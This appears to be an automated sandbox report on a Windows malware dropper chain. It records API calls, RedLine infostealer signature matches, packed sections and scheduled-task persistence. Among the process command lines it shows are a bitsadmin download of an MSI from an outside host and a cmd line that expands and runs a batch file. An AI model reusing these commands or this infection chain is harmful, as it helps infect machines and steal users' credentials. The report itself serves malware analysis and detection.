Code function: 51_2_01024763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

51_2_01024763

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

Code function: 51_2_01011B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

51_2_01011B4D

Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Code function: 25_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		25_2_004038AF
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_0101F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		51_2_0101F20D

Source: C:\Users\user\Desktop\random.exe	File created: C:\Windows\Tasks\rapes.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	File created: C:\Windows\CombatTongue
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	File created: C:\Windows\PracticeRoot
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	File created: C:\Windows\PlatesRegister
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	File created: C:\Windows\InterviewsEden

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 11_2_00D861F0	11_2_00D861F0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 11_2_00D8B700	11_2_00D8B700
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 11_2_00DC18D7	11_2_00DC18D7
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 11_2_00DC4047	11_2_00DC4047
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 11_2_00D851A0	11_2_00D851A0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 11_2_00D97320	11_2_00D97320
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 11_2_00DC5CD4	11_2_00DC5CD4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 11_2_00DAB4C0	11_2_00DAB4C0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 11_2_00D85450	11_2_00D85450
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 11_2_00D8CC40	11_2_00D8CC40
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 11_2_00DB2C20	11_2_00DB2C20
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 11_2_00DC5DF4	11_2_00DC5DF4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 11_2_00DAF6DB	11_2_00DAF6DB
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 11_2_00D84EF0	11_2_00D84EF0
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Code function: 16_2_03132630	16_2_03132630
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Code function: 19_2_00FEE7B0	19_2_00FEE7B0
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Code function: 19_2_00FEDC90	19_2_00FEDC90
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Code function: 19_2_06629630	19_2_06629630
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Code function: 19_2_06623720	19_2_06623720
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Code function: 19_2_06624468	19_2_06624468
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Code function: 19_2_0662D528	19_2_0662D528
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Code function: 19_2_06621210	19_2_06621210
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Code function: 19_2_0662DA30	19_2_0662DA30
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Code function: 25_2_0040737E	25_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Code function: 25_2_00406EFE	25_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Code function: 25_2_004079A2	25_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Code function: 25_2_004049A8	25_2_004049A8
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FD8017	51_2_00FD8017
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FBE1F0	51_2_00FBE1F0
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FCE144	51_2_00FCE144
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FB22AD	51_2_00FB22AD
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FD22A2	51_2_00FD22A2
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FEA26E	51_2_00FEA26E
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FCC624	51_2_00FCC624
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FEE87F	51_2_00FEE87F
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_0103C8A4	51_2_0103C8A4
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FE6ADE	51_2_00FE6ADE
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_01018BFF	51_2_01018BFF
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_01022A05	51_2_01022A05
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FCCD7A	51_2_00FCCD7A
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FDCE10	51_2_00FDCE10
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FE7159	51_2_00FE7159
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_01045311	51_2_01045311
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FB9240	51_2_00FB9240
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FB96E0	51_2_00FB96E0
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FD1704	51_2_00FD1704
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FD1A76	51_2_00FD1A76
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FD7B8B	51_2_00FD7B8B
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FB9B60	51_2_00FB9B60
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FD7DBA	51_2_00FD7DBA
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FD1D20	51_2_00FD1D20
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FD1FE7	51_2_00FD1FE7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: String function: 00FD0DA0 appears 46 times
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: String function: 00FCFD52 appears 40 times

Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6776 -s 804

Source: HmngBpR.exe.11.dr	Static PE information: Number of sections : 11 > 10
Source: HmngBpR[1].exe.11.dr	Static PE information: Number of sections : 11 > 10

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 19.2.PfOHmro.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 19.2.PfOHmro.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 19.2.PfOHmro.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.PfOHmro.exe.41b4170.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 16.2.PfOHmro.exe.41b4170.0.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 16.2.PfOHmro.exe.41b4170.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.PfOHmro.exe.41b4170.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 16.2.PfOHmro.exe.41b4170.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 16.2.PfOHmro.exe.41b4170.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.PfOHmro.exe.4199550.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 16.2.PfOHmro.exe.4199550.1.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 16.2.PfOHmro.exe.4199550.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000010.00000002.1588918971.0000000004199000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000013.00000002.2342024116.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: PfOHmro.exe PID: 6776, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: PfOHmro.exe PID: 4060, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: PfOHmro[1].exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PfOHmro.exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PfOHmro.exe0.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: V0Bt74c[1].exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: V0Bt74c.exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: random.exe	Static PE information: Section: ZLIB complexity 0.9989508006198347
Source: random.exe	Static PE information: Section: zmpqmbag ZLIB complexity 0.9940843995347485
Source: rapes.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9989508006198347
Source: rapes.exe.0.dr	Static PE information: Section: zmpqmbag ZLIB complexity 0.9940843995347485
Source: PfOHmro[1].exe.11.dr	Static PE information: Section: .CSS ZLIB complexity 1.0003681282722514
Source: PfOHmro.exe.11.dr	Static PE information: Section: .CSS ZLIB complexity 1.0003681282722514
Source: FvbuInU[1].exe.11.dr	Static PE information: Section: kzbupdkl ZLIB complexity 0.9941578305361483
Source: FvbuInU.exe.11.dr	Static PE information: Section: kzbupdkl ZLIB complexity 0.9941578305361483
Source: v6Oqdnc[1].exe.11.dr	Static PE information: Section: wnvsgzkd ZLIB complexity 0.994730281595516
Source: v6Oqdnc.exe.11.dr	Static PE information: Section: wnvsgzkd ZLIB complexity 0.994730281595516
Source: PfOHmro.exe0.11.dr	Static PE information: Section: .CSS ZLIB complexity 1.0003681282722514
Source: mAtJWNv[1].exe.11.dr	Static PE information: Section: .css ZLIB complexity 0.9975900423728814
Source: mAtJWNv.exe.11.dr	Static PE information: Section: .css ZLIB complexity 0.9975900423728814
Source: CgmaT61[1].exe.11.dr	Static PE information: Section: mzhehwmc ZLIB complexity 0.9941881155740228
Source: CgmaT61.exe.11.dr	Static PE information: Section: mzhehwmc ZLIB complexity 0.9941881155740228
Source: ADFoyxP[1].exe.11.dr	Static PE information: Section: .reloc ZLIB complexity 1.002197265625
Source: ADFoyxP.exe.11.dr	Static PE information: Section: .reloc ZLIB complexity 1.002197265625
Source: yUI6F6C[1].exe.11.dr	Static PE information: Section: mzhehwmc ZLIB complexity 0.9941881155740228
Source: yUI6F6C.exe.11.dr	Static PE information: Section: mzhehwmc ZLIB complexity 0.9941881155740228
Source: V0Bt74c[1].exe.11.dr	Static PE information: Section: .CSS ZLIB complexity 1.0003352171985815
Source: V0Bt74c.exe.11.dr	Static PE information: Section: .CSS ZLIB complexity 1.0003352171985815
Source: random[1].exe0.11.dr	Static PE information: Section: pfyfukxi ZLIB complexity 0.9945897231867284
Source: afdbfd8fdc.exe.11.dr	Static PE information: Section: pfyfukxi ZLIB complexity 0.9945897231867284

Source: rapes.exe.0.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 61c1a86413.exe.11.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe.11.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: CgmaT61[1].exe.11.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: yUI6F6C.exe.11.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random.exe	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: yUI6F6C[1].exe.11.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: CgmaT61.exe.11.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: mAtJWNv[1].exe.11.dr, Ce716WgjPJi1to0DwO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: mAtJWNv.exe.11.dr, Ce716WgjPJi1to0DwO.cs	Cryptographic APIs: 'CreateDecryptor'

Source: ADFoyxP[1].exe.11.dr

Binary or memory string: qa).slN

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@105/147@0/6

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

Code function: 51_2_010241FA GetLastError,FormatMessageW,

51_2_010241FA

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_01012010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		51_2_01012010
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_01011A0B AdjustTokenPrivileges,CloseHandle,		51_2_01011A0B

Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe

25_2_004044D1

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

Code function: 51_2_0101DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

51_2_0101DD87

Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe

Code function: 25_2_004024FB CoCreateInstance,

25_2_004024FB

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

Code function: 51_2_01023A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

51_2_01023A0E

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\EDM8nAR[1].bat

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3168:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4480:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6776
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1680:120:WilError_03

Source: C:\Users\user\Desktop\random.exe

File created: C:\Users\user~1\AppData\Local\Temp\bb556cff4a

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat

Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\random.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmp61E2.tmp.19.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: random.exe	Virustotal: Detection: 62%
Source: random.exe	ReversingLabs: Detection: 60%

Source: random.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: random.exe	String found in binary or memory: " /add
Source: random.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: " /add
Source: rapes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: " /add
Source: rapes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: " /add

Source: C:\Users\user\Desktop\random.exe

File read: C:\Users\user\Desktop\random.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user~1\AppData\Local\Temp\10131261121\EDM8nAR.cmd"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\fltMC.exe fltmc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe "C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe"
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process created: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe "C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe"
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process created: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe "C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe"
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process created: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe "C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe"
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6776 -s 804
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe "C:\Users\user~1\AppData\Local\Temp\10141220101\ReK7Ewx.exe"
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
